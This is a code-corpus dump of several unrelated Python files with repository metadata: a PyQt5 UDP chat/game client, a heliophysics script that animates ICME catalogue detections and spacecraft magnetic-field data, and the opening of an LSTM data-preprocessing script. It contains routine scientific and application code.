measurements["precision_errors"] = precision_errors
json.dump(measurements, out, indent=6)
# remove the temporary file the measurements were written to
os.remove(self._measurement_file)
for func in self._functions:
func.stop()
| spcl/serverless-benchmarks | sebs/local/deployment.py | deployment.py | py | 4,773 | python | en | code | 97 | github-code | 36 | [
{
"api_name": "sebs.utils.LoggingBase",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "typing.List",
... |
27632896757 | import socket
import gui.main_gui as main_gui
import configparser
import lib.package
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QMessageBox
from game_class import Game_class
""" Загрузка параметров """
config = configparser.ConfigParser()
config.read("config.ini")
#Главное окно
class MainApp(QtWidgets.QMainWindow, main_gui.Ui_MainWindow):
def __init__(self, login):
super().__init__()
self.setupUi(self)
self.login = login
self.label.setText("Ваш логин: " + login)
self.lineEdit.setText(config["Server"]["host"])
self.lineEdit_4.setText(config["Server"]["port_client"])
self.pushButton.clicked.connect(self.connect)
self.pushButton_2.clicked.connect(self.set_config)
self.pushButton_3.clicked.connect(self.post_message)
self.pushButton_4.clicked.connect(self.get_message)
self.textEdit.setReadOnly(True)
self.comboBox.addItem("маг")
self.comboBox.addItem("воин")
self.comboBox.addItem("убийца")
# Для отправки и получения сообщений
self.sor = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sor.bind(('', 0))
self.get_message()
def message(self, icon, title, text, button):
msg = QMessageBox()
msg.setIcon(icon)
msg.setWindowTitle(title)
msg.setText(text)
msg.setStandardButtons(button)
msg.exec_()
def connect(self):
# Формируем запрос
data = lib.package.set_package(command='c', login=self.login)
# Отправляем запрос на сервер
self.sor.sendto(data.encode('utf-8'), (config["Server"]["host"], int(config["Server"]["port_client"])))
# Получаение ответа от сервера
data = self.sor.recv(1024).decode('utf-8')
# Подключение к комнате
if data == '0':
self.close()
type = self.comboBox.currentText()
game = Game_class(self.login, type)
game.start()
else:
self.message(QMessageBox.Critical, "Ошибка", "Ошибка ", QMessageBox.Cancel)
def set_config(self):
host = self.lineEdit.text()
port_client = self.lineEdit_4.text()
config.set('Server', 'host', str(host))
config.set('Server', 'port_client', str(port_client))
with open('config.ini', 'w') as configfile:
config.write(configfile)
print("done")
def post_message(self):
message = self.lineEdit_5.text()
# Создаем запрос
data = lib.package.set_package(command='m', login=self.login, message=message)
# Отправляем запрос на сервер
self.sor.sendto(data.encode('utf-8'), (config["Server"]["host"], int(config["Server"]["port_client"])))
# Обновляем окно
self.get_message()
self.lineEdit_5.setText("")
def get_message(self):
# Создаем запрос
data = lib.package.set_package(command='g')
# делаем запрос к серверу
self.sor.sendto(data.encode('utf-8'), (config["Server"]["host"], int(config["Server"]["port_client"])))
# Получаем сообщение от сервера
data = self.sor.recv(1024).decode('utf-8')
# Декодируем ответ сервера
map = lib.package.get_package(data)
data = map["message"]
# Переформатирование текста
message = ""
login = ""
text = ""
flag = 0
for i in data:
if i == "/":
if flag == 0:
flag = 1
if self.login == login:
message += "<font color=\"Red\">" + login + "</font>: "
else:
message += "<font color=\"Green\">" + login + "</font>: "
login = ""
else:
flag = 0
message += "<font color=\"Black\">" + text + "</font><br>"
text = ""
continue
if i == "!":
break
if flag == 0:
login += i
if flag == 1:
text += i
# Отображаем сообщения
self.textEdit.setHtml(message) | Arrakktur/game | client_game/main_class.py | main_class.py | py | 4,540 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "configparser.ConfigParser",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtWidgets.QMainWindow",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "PyQt5.QtWidgets",
"line_number": 14,
"usage_type": "name"
},
{
"api_na... |
70188062823 | #animation ICMECAT rose scatter plot with HI CME circles and in situ data
from scipy import stats
import scipy.io
from matplotlib import cm
import sys
import os
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import numpy as np
import sunpy.time
import time
import pickle
import seaborn as sns
import math
#for reading catalogues
def getcat(filename):
print('reading CAT '+filename)
cat=scipy.io.readsav(filename, verbose='true')
print('done reading CAT')
return cat
def getpositions(filename):
print( 'reading positions in '+filename)
pos=scipy.io.readsav(filename, verbose='true')
print( 'done reading positions')
return pos
def time_to_num_cat(time_in):
#for time conversion from catalogue .sav to numerical time
#this for 1-minute data or lower time resolution
#for all catalogues
#time_in is the time in format: 2007-11-17T07:20:00 or 2007-11-17T07:20Z
#for times help see:
#http://docs.sunpy.org/en/latest/guide/time.html
#http://matplotlib.org/examples/pylab_examples/date_demo2.html
j=0
#time_str=np.empty(np.size(time_in),dtype='S19')
time_str= ['' for x in range(len(time_in))]
#=np.chararray(np.size(time_in),itemsize=19)
time_num=np.zeros(np.size(time_in))
for i in time_in:
#convert from bytes (output of scipy.readsav) to string
time_str[j]=time_in[j][0:16].decode()+':00'
year=int(time_str[j][0:4])
time_str[j]
#convert time to sunpy friendly time and to matplotlibdatetime
#only for valid times so 9999 in year is not converted
#pdb.set_trace()
if year < 2100:
time_num[j]=mdates.date2num(sunpy.time.parse_time(time_str[j]))
j=j+1
#the date format in matplotlib is e.g. 735202.67569444
#this is time in days since 0001-01-01 UTC, plus 1.
#return time_num which is already an array and convert the list of strings to an array
return time_num, np.array(time_str)
def decode_array(bytearrin):
#for decoding the strings from the IDL .sav file to a list of python strings, not bytes
#make list of python lists with arbitrary length
bytearrout= ['' for x in range(len(bytearrin))]
for i in range(0,len(bytearrin)-1):
bytearrout[i]=bytearrin[i].decode()
#has to be np array so to be used with numpy "where"
bytearrout=np.array(bytearrout)
return bytearrout
def IDL_time_to_num(time_in):
#convert IDL time to matplotlib datetime
time_num=np.zeros(np.size(time_in))
for ii in np.arange(0,np.size(time_in)):
time_num[ii]=mdates.date2num(sunpy.time.parse_time(time_in[ii]))
return time_num
######################################################
#main program
plt.close('all')
sns.set_context("talk")
sns.set_style("darkgrid")
################## CONTROLS
#how much time is between frames
dayjump=0.25
#either keep or fade detections
fade=1
keep=0
#if keep is selected, the alpha for plotting each dot
keepalpha=0.7
#how long an ARRIVAL stays visible in fade mode
fadedays=30
#how big the circles are on the plot
bscale=4
#half width of the circles
lamda=30
################################
print( 'start icmecat animation program.')
#get ICMECAT
filename_icmecat='ALLCATS/HELCATS_ICMECAT_v10_SCEQ.sav'
i=getcat(filename_icmecat)
#get parameters
bmean=i.icmecat['MO_BMEAN']*bscale #bscale makes circles larger in movie
long=i.icmecat['SC_LONG_HEEQ']*np.pi/180 #heeq longitude converted to radians
rdist=i.icmecat['sc_heliodistance'] #AU
sc=i.icmecat['sc_insitu'] #string
sc=decode_array(sc)
#get indices of events in different spacecraft
vexind=np.where(sc == 'VEX')
staind=np.where(sc == 'STEREO-A')
stbind=np.where(sc == 'STEREO-B')
winind=np.where(sc == 'Wind')
mesind=np.where(sc == 'MESSENGER')
ulyind=np.where(sc == 'ULYSSES')
##################################### read in situ
print( 'read MESSENGER')
#get insitu data
mes= pickle.load( open( "DATACAT/MES_2007to2015_SCEQ_removed.p", "rb" ) )
#time conversion
#mes_time=IDL_time_to_num(mes.time)
print( 'read MESSENGER done.')
print ('read VEX')
#get insitu data
vex= pickle.load( open( "DATACAT/VEX_2007to2014_SCEQ_removed.p", "rb" ) )
#time conversion
#vex_time=IDL_time_to_num(vex.time)
print( 'read VEX done.')
print( 'read Wind')
#get insitu data
wind= pickle.load( open( "DATACAT/WIND_2007to2016_HEEQ.p", "rb" ) )
#time conversion
#wind_time=IDL_time_to_num(wind.time)
print( 'read Wind done.')
print( 'read STEREO-A')
#get insitu data
sta= pickle.load( open( "DATACAT/STA_2007to2015_SCEQ.p", "rb" ) )
#time conversion
#sta_time=IDL_time_to_num(sta.time)
print( 'read STA done.')
print( 'read STEREO-B')
#get insitu data
stb= pickle.load( open( "DATACAT/STB_2007to2014_SCEQ.p", "rb" ) )
#time conversion
#stb_time=IDL_time_to_num(stb.time)
print( 'read STB done.')
#save times
#pickle.dump([vex_time,wind_time,sta_time,stb_time,mes_time], open( "DATACAT/Insitu_times_mdates_2.p", "wb" ) )
#quicker when just reloading times
[vex_time,wind_time,sta_time,stb_time,mes_time]=pickle.load( open( "DATACAT/Insitu_times_mdates_2.p", "rb" ) )
#print 'loaded in situ times'
######################################
#get positions
pos=getpositions('DATACAT/positions_2007_2018_HEEQ_6hours.sav')
[pos_time_num,pos_time_str]=time_to_num_cat(pos.time)
#available as pos.mercury etc.
#get cme apex positions
h=getcat('ALLCATS/hicat_v3_cat_behind_visual.sav')
[h_time_num,h_time_str]=time_to_num_cat(h.all_apex_t_str)
all_apex_s=decode_array(h.all_apex_s)
#make time conversion for all icme_start_time variables
#save it as string
icme_start_time_str=i.icmecat['icme_start_time']
#save it as matplotlib date number
[icme_start_time_num,icme_start_time_str]=time_to_num_cat(icme_start_time_str)
#for each spacecraft, make a zeros array
active_icme_vex=np.zeros(np.size(icme_start_time_num))
active_icme_stb=np.zeros(np.size(icme_start_time_num))
active_icme_sta=np.zeros(np.size(icme_start_time_num))
active_icme_win=np.zeros(np.size(icme_start_time_num))
active_icme_mes=np.zeros(np.size(icme_start_time_num))
active_icme_uly=np.zeros(np.size(icme_start_time_num))
#initiate plot
plt.figure(1, figsize=(12, 6), dpi=100, facecolor='w', edgecolor='w')
#full movie April 2014 Jan 1 until end of November 2014
frame_time_num=mdates.date2num(sunpy.time.parse_time('2007-Apr-1'))
################################### plot over all frames
for k in np.arange(12680/4,(12680+120)/4,dayjump):
#3169 is time in days
start=time.time()
#to current frame time, the days need to be added, so +k is done
#save frame time as string to write on plot
frame_time_str=str(mdates.num2date(frame_time_num+k))
print( 'current frame_time_num+k', frame_time_str)
#for each frame time, check active ICMEs by looking into the full catalogue:
for m in range(0,len(icme_start_time_num)):
#calculate difference in icme_start_time to current frame
icme_diff_to_frame=(frame_time_num+k)-icme_start_time_num[m]
#for all icme_start_times that are later than the current frame,
#make them active for 30 days (fading) or infinite (keeping).
#**********************for fading
if fade > 0:
if icme_diff_to_frame > 0 and icme_diff_to_frame < fadedays:
#check if this active icme belongs to a spacecraft
#in1d compares to arrays; true or 1 if m is contained in vexind
if np.in1d(m,vexind) == 1:
active_icme_vex[m]=icme_diff_to_frame
#same for the other spacecraft
if np.in1d(m,stbind) == 1:
active_icme_stb[m]=icme_diff_to_frame
if np.in1d(m,staind) == 1:
active_icme_sta[m]=icme_diff_to_frame
if np.in1d(m,winind) == 1:
active_icme_win[m]=icme_diff_to_frame
if np.in1d(m,mesind) == 1:
active_icme_mes[m]=icme_diff_to_frame
if np.in1d(m,ulyind) == 1:
active_icme_uly[m]=icme_diff_to_frame
else:
#if no detection, set the index to 0
active_icme_vex[m]=0
active_icme_stb[m]=0
active_icme_sta[m]=0
active_icme_win[m]=0
active_icme_mes[m]=0
active_icme_uly[m]=0
#************************** for keeping
if keep > 0:
if icme_diff_to_frame > 0:
#check if this active icme belongs to a spacecraft
#in1d compares to arrays; true or 1 if m is contained in vexind
if np.in1d(m,vexind) == 1:
active_icme_vex[m]=icme_diff_to_frame
#same for the other spacecraft
if np.in1d(m,stbind) == 1:
active_icme_stb[m]=icme_diff_to_frame
if np.in1d(m,staind) == 1:
active_icme_sta[m]=icme_diff_to_frame
if np.in1d(m,winind) == 1:
active_icme_win[m]=icme_diff_to_frame
if np.in1d(m,mesind) == 1:
active_icme_mes[m]=icme_diff_to_frame
else:
#if no detection, set the index to 0
active_icme_vex[m]=0
active_icme_stb[m]=0
active_icme_sta[m]=0
active_icme_win[m]=0
active_icme_mes[m]=0
#look which ICMEs are active
active_index_vex=np.where(active_icme_vex > 0)
active_index_stb=np.where(active_icme_stb > 0)
active_index_sta=np.where(active_icme_sta > 0)
active_index_win=np.where(active_icme_win > 0)
active_index_mes=np.where(active_icme_mes > 0)
active_index_uly=np.where(active_icme_uly > 0)
#print 'active icme indices are:', active_index_vex
print (' ')
#check for active CME indices from HICAT (with the lists produced in IDL for the apex positions)
#check where time is identical to frame time
cmeind=np.where(h_time_num == frame_time_num+k)
############make plot
# rows - columns, starts with 0
ax = plt.subplot2grid((5,2), (0, 0), rowspan=5, projection='polar')
#ax = plt.subplot(121,projection='polar')
######################## 1 plot all active CME circles
#ax.scatter(h.all_apex_long[cmeind]*np.pi/180,h.all_apex_r[cmeind], s=10, c='black', alpha=1, marker='s')
#plot all active CME circles
#if np.size(cmeind) >0:
for p in range(0,np.size(cmeind)):
#print p, h.all_apex_long[cmeind[0][p]], h.all_apex_r[cmeind[0][p]]
#central d
dir=np.array([np.cos(h.all_apex_long[cmeind[0][p]]*np.pi/180),np.sin(h.all_apex_long[cmeind[0][p]]*np.pi/180)])*h.all_apex_r[cmeind[0][p]]
#points on circle, correct for longitude
circ_ang = ((np.arange(111)*2-20)*np.pi/180)-(h.all_apex_long[cmeind[0][p]]*np.pi/180)
#these equations are from moestl and davies 2013
xc = 0+dir[0]/(1+np.sin(lamda*np.pi/180)) + (h.all_apex_r[cmeind[0][p]]*np.sin(lamda*np.pi/180)/(1+np.sin(lamda*np.pi/180)))*np.sin(circ_ang)
yc = 0+dir[1]/(1+np.sin(lamda*np.pi/180)) + (h.all_apex_r[cmeind[0][p]]*np.sin(lamda*np.pi/180)/(1+np.sin(lamda*np.pi/180)))*np.cos(circ_ang)
#now convert to polar coordinates
rcirc=np.sqrt(xc**2+yc**2)
longcirc=np.arctan2(yc,xc)
#plot in correct color
if all_apex_s[cmeind[0][p]] == 'A':
#make alpha dependent on distance to solar equatorial plane - maximum latitude is -40/+40 -
#so to make also the -/+40 latitude CME visible, divide by 50 so alpha > 0 for these events
ax.plot(longcirc,rcirc, c='red', alpha=1-abs(h.all_apex_lat[cmeind[0][p]]/50), lw=1.5)
if all_apex_s[cmeind[0][p]] == 'B':
ax.plot(longcirc,rcirc, c='royalblue', alpha=1-abs(h.all_apex_lat[cmeind[0][p]]/50), lw=1.5)
####################### 3 plot ICME detections
#fader style plot alpha dependent on time difference - for this loop over each element:
if fade >0:
for y in range(0,np.size(active_index_vex)):
z=active_index_vex[0][y] #access elements in tuple that is produced by where
fadealpha=1-active_icme_vex[z]/(fadedays) #fadedays is maximum difference in time, and alpha from 0 to 1
ax.scatter(long[z], rdist[z], s=bmean[z], c='orange', alpha=fadealpha)
for y in range(0,np.size(active_index_sta)):
z=active_index_sta[0][y]
fadealpha=1-active_icme_sta[z]/(fadedays) #30 days is maximum difference in time, and alpha from 0 to 1
ax.scatter(long[z], rdist[z], s=bmean[z], c='red', alpha=fadealpha)
for y in range(0,np.size(active_index_stb)):
z=active_index_stb[0][y]
fadealpha=1-active_icme_stb[z]/(fadedays) #30 days is maximum difference in time, and alpha from 0 to 1
ax.scatter(long[z], rdist[z], s=bmean[z], c='royalblue', alpha=fadealpha)
for y in range(0,np.size(active_index_win)):
z=active_index_win[0][y]
fadealpha=1-active_icme_win[z]/(fadedays) #30 days is maximum difference in time, and alpha from 0 to 1
ax.scatter(long[z], rdist[z], s=bmean[z], c='mediumseagreen', alpha=fadealpha)
for y in range(0,np.size(active_index_mes)):
z=active_index_mes[0][y]
fadealpha=1-active_icme_mes[z]/(fadedays) #30 days is maximum difference in time, and alpha from 0 to 1
ax.scatter(long[z], rdist[z], s=bmean[z], c='dimgrey', alpha=fadealpha)
for y in range(0,np.size(active_index_uly)):
z=active_index_uly[0][y]
fadealpha=1-active_icme_uly[z]/(fadedays) #30 days is maximum difference in time, and alpha from 0 to 1
ax.scatter(long[z], rdist[z], s=bmean[z], c='darkolivegreen', alpha=fadealpha)
if keep >0:
ax.scatter(long[active_index_vex], rdist[active_index_vex], s=bmean[active_index_vex], c='orange', alpha=keepalpha)
ax.scatter(long[active_index_sta], rdist[active_index_sta], s=bmean[active_index_sta], c='red', alpha=keepalpha)
ax.scatter(long[active_index_stb], rdist[active_index_stb], s=bmean[active_index_stb], c='royalblue', alpha=keepalpha)
ax.scatter(long[active_index_win], rdist[active_index_win], s=bmean[active_index_win], c='mediumseagreen', alpha=keepalpha)
ax.scatter(long[active_index_mes], rdist[active_index_mes], s=bmean[active_index_mes], c='dimgrey', alpha=keepalpha)
plt.suptitle('STEREO/HI modeled CMEs (SSEF30) + in situ ICME detections and data HELCATS - HIGEOCAT ICMECAT DATACAT', fontsize=12)
#Sun
ax.scatter(0,0,s=100,c='yellow',alpha=0.8, edgecolors='yellow')
plt.figtext(0.30,0.5,'Sun', fontsize=10, ha='center')
#Earth
plt.figtext(0.30,0.25,'Earth', fontsize=10, ha='center')
#units
#plt.figtext(0.525,0.0735,'HEEQ longitude', fontsize=10, ha='left')
#plt.figtext(0.655,0.164,'AU', fontsize=10, ha='center')
#----------------- legend
plt.figtext(0.05,0.02,'Mercury', color='dimgrey', ha='center', fontsize=12)
plt.figtext(0.15,0.02,'MESSENGER', color='dimgrey', ha='center', fontsize=10)
plt.figtext(0.25 ,0.02,'Venus', color='orange', ha='center',fontsize=12)
plt.figtext(0.35,0.02,'STEREO-A', color='red', ha='center',fontsize=12)
plt.figtext(0.48,0.02,'STEREO-B', color='royalblue', ha='center',fontsize=12)
plt.figtext(0.58,0.02,'Earth', color='mediumseagreen', ha='center',fontsize=12)
plt.figtext(0.65,0.02,'Mars', color='orangered', ha='center',fontsize=10)
plt.figtext(0.71,0.02,'MSL', color='magenta', ha='center', fontsize=10)
plt.figtext(0.76,0.02,'Maven', color='steelblue', ha='center', fontsize=10)
plt.figtext(0.83,0.02,'Ulysses', color='darkolivegreen', ha='center', fontsize=10)
plt.figtext(0.90,0.02,'Rosetta', color='black', ha='center', fontsize=10)
#add legend for bmean
bleg=np.array([10,50,100])*bscale
blegstr=['10 nT','50','100']
blegr=np.zeros(len(bleg))+1.6
blegt=np.radians(range(170,195,10))
ax.scatter(blegt, blegr,s=bleg,c='violet', edgecolor='violet')
for p in range(0,len(bleg)):
ax.annotate(blegstr[p],xy=(blegt[p],blegr[p]-0.2), ha='center', va='center', fontsize=8)
############################## plot positions
#check which index is closest in positions to current time
#frame_time_num+k vs. pos_time_num
timeind=np.where(frame_time_num+k-pos_time_num == min(abs((frame_time_num+k)-pos_time_num)))
#index 1 is longitude, 0 is rdist
ax.scatter(pos.venus[1,timeind], pos.venus[0,timeind], s=50, c='orange', alpha=1, lw=0)
ax.scatter(pos.mercury[1,timeind], pos.mercury[0,timeind], s=50, c='dimgrey', alpha=1,lw=0)
ax.scatter(pos.messenger[1,timeind], pos.messenger[0,timeind], s=25, c='dimgrey', alpha=1,lw=0,marker='s')
ax.scatter(pos.sta[1,timeind], pos.sta[0,timeind], s=25, c='red', alpha=1,lw=0, marker='s')
ax.scatter(pos.stb[1,timeind], pos.stb[0,timeind], s=25, c='royalblue', alpha=1,lw=0, marker='s')
ax.scatter(pos.earth[1,timeind], pos.earth[0,timeind], s=50, c='mediumseagreen', alpha=1,lw=0)
ax.scatter(pos.mars[1,timeind], pos.mars[0,timeind], s=50, c='orangered', alpha=1,lw=0)
ax.scatter(pos.ulysses[1,timeind], pos.ulysses[0,timeind], s=25, c='darkolivegreen', alpha=1,lw=0,marker='s')
ax.scatter(pos.msl[1,timeind], pos.msl[0,timeind], s=25, c='magenta', alpha=1,lw=0,marker='s')
ax.scatter(pos.maven[1,timeind], pos.maven[0,timeind], s=25, c='steelblue', alpha=1,lw=0, marker='s')
ax.scatter(pos.rosetta[1,timeind], pos.rosetta[0,timeind], s=25, c='black', alpha=1,lw=0, marker='s')
#set axes
plt.thetagrids(range(0,360,45),(u'0\u00b0 HEEQ longitude',u'45\u00b0',u'90\u00b0',u'135\u00b0',u'+/- 180\u00b0',u'-135\u00b0',u'-90\u00b0',u'-45\u00b0'), fmt='%d', frac = 1.05,fontsize=10)
ax.set_theta_zero_location('S')
ax.set_ylim(0, 1.8)
plt.rgrids((0.4,0.7,1.0,1.3,1.6),('0.4','0.7','1.0','1.3','1.6 AU'),fontsize=10)
#plot text for date extra so it does not move
#year
plt.figtext(0.47-0.22,0.9,frame_time_str[0:4], fontsize=13, ha='center')
#month
plt.figtext(0.51-0.22,0.9,frame_time_str[5:7], fontsize=13, ha='center')
#day
plt.figtext(0.54-0.22,0.9,frame_time_str[8:10], fontsize=13, ha='center')
#hours
plt.figtext(0.57-0.22,0.9,frame_time_str[11:13], fontsize=13, ha='center')
#mysignature
plt.figtext(0.96,0.01,r'$C. M\ddot{o}stl$', fontsize=7, ha='center')
############# 5 in situ data plots
plotstartdate=mdates.num2date(frame_time_num+k-3)
plotenddate=mdates.num2date(frame_time_num+k+3)
#slicing
#take only those indices where the difference to frame_time_num+k is less than 3
mes_ind_plot=np.where(abs(mes_time-(frame_time_num+k)) < 3)
vex_ind_plot=np.where(abs(vex_time-(frame_time_num+k)) < 3)
stb_ind_plot=np.where(abs(stb_time-(frame_time_num+k)) < 3)
sta_ind_plot=np.where(abs(sta_time-(frame_time_num+k)) < 3)
wind_ind_plot=np.where(abs(wind_time-(frame_time_num+k)) < 3)
#rows - columns
#MESSENGER
ax2 = plt.subplot2grid((5,2), (0, 1))
ax2.plot_date(mes_time[mes_ind_plot],mes.btot[mes_ind_plot],'-k', lw=0.3)
ax2.plot_date(mes_time[mes_ind_plot],mes.bx[mes_ind_plot], '-r',lw=0.3)
ax2.plot_date(mes_time[mes_ind_plot],mes.by[mes_ind_plot],'-g',lw=0.3)
ax2.plot_date(mes_time[mes_ind_plot],mes.bz[mes_ind_plot],'-b',lw=0.3)
plt.tick_params( axis='x', labelbottom='off')
#current time
plt.yticks(fontsize=9)
plt.ylabel('B SCEQ [nT]', fontsize=9)
ax2.plot_date([mdates.num2date(frame_time_num+k),mdates.num2date(frame_time_num+k)], [-120,120],'-k', lw=0.5, alpha=0.8)
plt.xlim((plotstartdate, plotenddate))
plt.ylim((-120, 120))
#VEX
ax3 = plt.subplot2grid((5,2), (1, 1))
ax3.plot_date(vex_time[vex_ind_plot],vex.btot[vex_ind_plot],'-k', lw=0.3)
ax3.plot_date(vex_time[vex_ind_plot],vex.bx[vex_ind_plot], '-r',lw=0.3)
ax3.plot_date(vex_time[vex_ind_plot],vex.by[vex_ind_plot],'-g',lw=0.3)
ax3.plot_date(vex_time[vex_ind_plot],vex.bz[vex_ind_plot],'-b',lw=0.3)
plt.tick_params( axis='x', labelbottom='off')
plt.yticks(fontsize=9)
plt.ylabel('B SCEQ [nT]', fontsize=9)
ax3.plot_date([mdates.num2date(frame_time_num+k),mdates.num2date(frame_time_num+k)], [-50,50],'-k', lw=0.5, alpha=0.8)
plt.xlim((plotstartdate, plotenddate))
plt.ylim((-50, 50))
#Earth
ax4 = plt.subplot2grid((5,2), (2, 1))
ax4.plot_date(wind_time[wind_ind_plot],wind.btot[wind_ind_plot],'-k', lw=0.3)
ax4.plot_date(wind_time[wind_ind_plot],wind.bx[wind_ind_plot], '-r',lw=0.3)
ax4.plot_date(wind_time[wind_ind_plot],wind.by[wind_ind_plot],'-g',lw=0.3)
ax4.plot_date(wind_time[wind_ind_plot],wind.bz[wind_ind_plot],'-b',lw=0.3)
plt.tick_params( axis='x', labelbottom='off')
plt.yticks(fontsize=9)
plt.ylabel('B SCEQ [nT]', fontsize=9)
ax4.plot_date([mdates.num2date(frame_time_num+k),mdates.num2date(frame_time_num+k)], [-50,50],'-k', lw=0.5, alpha=0.8)
plt.xlim((plotstartdate, plotenddate))
plt.ylim((-35, 35))
#STA
ax5 = plt.subplot2grid((5,2), (3, 1))
ax5.plot_date(sta_time[sta_ind_plot],sta.btot[sta_ind_plot],'-k', lw=0.3)
ax5.plot_date(sta_time[sta_ind_plot],sta.bx[sta_ind_plot], '-r',lw=0.3)
ax5.plot_date(sta_time[sta_ind_plot],sta.by[sta_ind_plot],'-g',lw=0.3)
ax5.plot_date(sta_time[sta_ind_plot],sta.bz[sta_ind_plot],'-b',lw=0.3)
plt.tick_params( axis='x', labelbottom='off')
plt.yticks(fontsize=9)
plt.ylabel('B SCEQ [nT]', fontsize=9)
ax5.plot_date([mdates.num2date(frame_time_num+k),mdates.num2date(frame_time_num+k)], [-50,50],'-k', lw=0.5, alpha=0.8)
plt.xlim((plotstartdate, plotenddate))
plt.ylim((-35, 35))
#STB
ax6 = plt.subplot2grid((5,2), (4, 1))
ax6.plot_date(stb_time[stb_ind_plot],stb.btot[stb_ind_plot],'-k', lw=0.3)
ax6.plot_date(stb_time[stb_ind_plot],stb.bx[stb_ind_plot], '-r',lw=0.3)
ax6.plot_date(stb_time[stb_ind_plot],stb.by[stb_ind_plot],'-g',lw=0.3)
ax6.plot_date(stb_time[stb_ind_plot],stb.bz[stb_ind_plot],'-b',lw=0.3)
plt.xlim((plotstartdate, plotenddate))
myformat = mdates.DateFormatter('%m-%d')
ax6.xaxis.set_major_formatter(myformat)
plt.yticks(fontsize=9)
plt.ylabel('B SCEQ [nT]', fontsize=9)
ax6.plot_date([mdates.num2date(frame_time_num+k),mdates.num2date(frame_time_num+k)], [-50,50],'-k', lw=0.5, alpha=0.8)
plt.ylim((-35, 35))
plt.xticks(fontsize=10)
#labeling of spacecraft and longitude in HEEQ
plt.figtext(0.92,0.82,'MESSENGER',color='dimgrey', fontsize=10, ha='left')
plt.figtext(0.94,0.77,"%d" % (pos.messenger[1,timeind]*180/np.pi),color='black', fontsize=10, ha='right')
plt.figtext(0.92,0.82-0.165,'VEX',color='orange', fontsize=10, ha='left')
plt.figtext(0.94,0.77-0.165,"%d" % (pos.venus[1,timeind]*180/np.pi),color='black', fontsize=10, ha='right')
plt.figtext(0.92,0.82-0.165*2,'Wind',color='mediumseagreen', fontsize=10, ha='left')
plt.figtext(0.94,0.77-0.165*2,"%d" % (pos.earth[1,timeind]*180/np.pi),color='black', fontsize=10, ha='right')
plt.figtext(0.92,0.82-0.165*3,'STEREO-A',color='red', fontsize=10, ha='left')
plt.figtext(0.94,0.77-0.165*3,"%d" % (pos.sta[1,timeind]*180/np.pi),color='black', fontsize=10, ha='right')
plt.figtext(0.92,0.82-0.165*4,'STEREO-B',color='royalblue', fontsize=10, ha='left')
plt.figtext(0.94,0.77-0.165*4,"%d" % (pos.stb[1,timeind]*180/np.pi),color='black', fontsize=10, ha='right')
#labeling in situ components
plt.figtext(0.75,0.92,'Bx',color='red', fontsize=10, ha='left')
plt.figtext(0.8,0.92,'By',color='green', fontsize=10, ha='left')
plt.figtext(0.85,0.92,'Bz',color='blue', fontsize=10, ha='left')
#save figure for frame - this starts with zero at the start time
framestr = '%04i' % (k*4)
#framenr=framenr+1
print( 'frame nr.', framestr)
#plt.show()
if fade >0:
plt.savefig('animations/animation_icmecat_6hour_fade_circ_insitu_final_full/icmecat_'+framestr+'.png', dpi=300)
#plt.savefig('animations/animation_icmecat_6hour_fade_circ_insitu_final_full/icmecat_'+framestr+'.jpg', dpi=300)
# if keep >0:
# plt.savefig('animations/animation_icmecat_6hour_keep_circ_insitu_final_full/icmecat_'+framestr+'.jpg', format='jpg', dpi=300)
end=time.time()
print( 'took time in seconds:', (end-start) ,'for this frame')
#clears plot window
plt.clf()
############end of cycle
#make animation convert with automator into jpg before
#os.system('/Users/chris/movie/ffmpeg -r 15 -i /Users/chris/python/catpy/animations/animation_icmecat_6hour_fade_circ_insitu_final_full_jpg/icmecat_%04d.jpg -b 5000k -r 15 animations/icmecat_anim_6hour_fade_circ_insitu_final_full.mp4 -y')
print( 'made movie')
print( 'end icmecat animation program.')
#/Users/chris/movie/ffmpeg -r 15 -i /Users/chris/python/catpy/animations/animation_icmecat_6hour_fade_circ_insitu_all/icmecat_%04d.jpg -b 5000k -r 15 animations/icmecat_anim_6hour_fade_circ_insitu_all.mp4 -y
| cmoestl/heliocats | scripts/icmecat_anim_circles_insitu_final_full.py | icmecat_anim_circles_insitu_final_full.py | py | 23,948 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "scipy.io.readsav",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "scipy.io",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "scipy.io.readsav",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "scipy.io",
"line_... |
30494220256 | import pandas as pd
import numpy as np
import tensorflow as tf
import time
import os
import csv
from sklearn.preprocessing import MinMaxScaler
from keras.layers import Input
from keras.layers import Dense, LSTM, Dropout, Embedding, Input, Activation, Bidirectional, TimeDistributed, RepeatVector, Flatten
from keras.optimizers import Adam
from sklearn.metrics import mean_squared_error
from math import sqrt
from keras.models import Sequential, Model
learning_rate=0.001
look_back=20
batch_size=5
hidden_nodes = 256
epochs = 100
adam = Adam(lr=learning_rate)
def create_dataset_input(dataset, look_back):
dataX = []
for i in range(len(dataset)-look_back):
dataX.append(dataset[i:(i+look_back)])
return np.array(dataX)
def mode_decide(input_mode):
train_mode=input_mode.split('-',1)[0]
val_mode=input_mode.split('-',1)[1]
error1=(train_mode!='a')and(train_mode!='b')and(train_mode!='ab')
error2=(train_mode!='a')and(train_mode!='b')and(train_mode!='ab')
if error1 or error2:
raise ValueError # Wrong input mode type
mode={'train_set':train_mode,'val_set':val_mode}
return mode
def load_data(mode):
filename=[mode['train_set']+'_train_set'+'.csv']
filename="".join(filename)
train_data=pd.read_csv(filename)
filename=[mode['val_set']+'_val_set'+'.csv']
filename="".join(filename)
val_data=pd.read_csv(filename)
return train_data,val_data
def data_prepocess(train_data,val_data,batch_size=batch_size,look_back=look_back):
#train_set 设置
train_raw_x=train_data['Loc_x']
train_raw_x=np.array(train_raw_x).astype(float).reshape(-1,1)
scaler_loc_x=MinMaxScaler()
train_loc_x=scaler_loc_x.fit_transform(train_raw_x)
train_raw_y=train_data['Loc_y']
train_raw_y=np.array(train_raw_y).astype(float).reshape(-1,1)
scaler_loc_y=MinMaxScaler()
train_loc_y=scaler_loc_y.fit_transform(train_raw_y)
